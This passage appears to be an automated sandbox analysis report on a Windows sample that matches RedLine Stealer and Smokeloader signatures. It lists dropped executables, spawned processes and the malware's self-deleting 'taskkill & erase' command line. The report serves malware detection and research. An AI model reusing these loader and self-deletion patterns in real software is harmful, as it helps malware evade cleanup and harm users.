Source: 00000000.00000000.248840662.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.280078685.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.279883585.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.284940570.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.252473091.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.248974366.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.260888078.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.242858773.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.249420938.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.279479542.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.279352370.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.252652451.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.242267138.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.256739991.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.284571510.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.267422154.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.266223376.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.253125485.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.265525344.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.261862995.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.242671157.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.285927973.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.261685846.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.260976008.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.253211211.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.257226679.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 532

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB553E		30_2_00007FFCA0CB553E
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB116B		30_2_00007FFCA0CB116B
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CBA91D		30_2_00007FFCA0CBA91D
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB28C2		30_2_00007FFCA0CB28C2
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB4601		30_2_00007FFCA0CB4601
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB9B6D		30_2_00007FFCA0CB9B6D
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB3F72		30_2_00007FFCA0CB3F72
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB1B2E		30_2_00007FFCA0CB1B2E
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB2EE5		30_2_00007FFCA0CB2EE5
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB57D8		30_2_00007FFCA0CB57D8
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB4EDD		30_2_00007FFCA0CB4EDD

Source: file.exe

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79

Source: file.exe, 00000000.00000003.329174439.0000000003B66000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.322735199.0000000003735000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.330761545.0000000003960000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.331371122.0000000003B95000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.323082305.000000000390E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.323416274.0000000003AF9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.328400230.0000000003943000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.324070957.000000000373E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.327501854.0000000003946000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.330045945.0000000003734000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.325291539.000000000392E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.327061375.000000000373D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.327857443.0000000003735000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.326688973.0000000003B2B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe
Source: file.exe, 00000000.00000003.332041691.0000000003735000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMmail.exe, vs file.exe

Source: Cleaner.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

ReversingLabs: Detection: 47%

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 532
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 700
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 700
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 720
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 776
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 868
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 880
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 976
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1268
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1556
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Cleaner.lnk.0.dr

LNK file: ..\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "file.exe")

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn

Jump to behavior

Source: classification engine

Classification label: mal96.troj.winEXE@21/51@1/5

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5112:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6136

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ^\C:\car.pdb source: file.exe
Source:	Binary string: C:\car.pdb source: file.exe

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB2EE5 push ss; iretd		30_2_00007FFCA0CB34AC
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB3384 push ss; iretd		30_2_00007FFCA0CB34AC
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Code function: 30_2_00007FFCA0CB32F2 push ss; iretd		30_2_00007FFCA0CB34AC

Source: Cleaner.exe.0.dr

Static PE information: 0xEAE49AF1 [Wed Nov 17 16:40:17 2094 UTC]

Source: initial sample	Static PE information: section name: .text entropy: 7.920922021912582
Source: initial sample	Static PE information: section name: .text entropy: 7.920922021912582

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\dll[1]			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\soft[1]			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Bunifu_UI_v1.5.3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\soft[1]			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\dll[1]			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
